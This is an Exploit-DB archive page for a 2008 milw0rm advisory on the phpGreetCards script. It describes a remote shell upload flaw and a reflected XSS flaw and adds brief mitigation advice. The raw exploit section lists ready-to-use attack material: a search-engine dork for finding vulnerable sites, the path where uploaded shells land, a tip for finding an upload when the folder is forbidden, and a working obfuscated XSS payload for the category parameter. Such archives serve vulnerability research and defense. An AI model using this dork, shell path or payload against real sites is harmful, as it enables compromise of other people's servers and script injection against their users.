remote shell upload/xss

vendor:

phpGreetCards

by:

ahmadbady

7.5

CVSS

HIGH

Remote Shell Upload/XSS

CWE

Product Name: phpGreetCards

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A vulnerability exists in phpGreetCards script, which allows an attacker to upload a malicious shell and execute arbitrary code. An XSS vulnerability also exists in the 'index.php?mode=select&category' parameter, which allows an attacker to inject arbitrary web script or HTML.

Mitigation:

Ensure that the userfiles folder is not accessible from the web, and that all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

...................................................................................................

****(remote shell upload/xss)****

script: phpGreetCards
   
***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip
   
***************************************************************************
www.site.com/path/index.php?mode=select&category

shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"

if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.
  
------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>  
**************************************************


Author: ahmadbady 

**************************************************

# milw0rm.com [2008-12-23]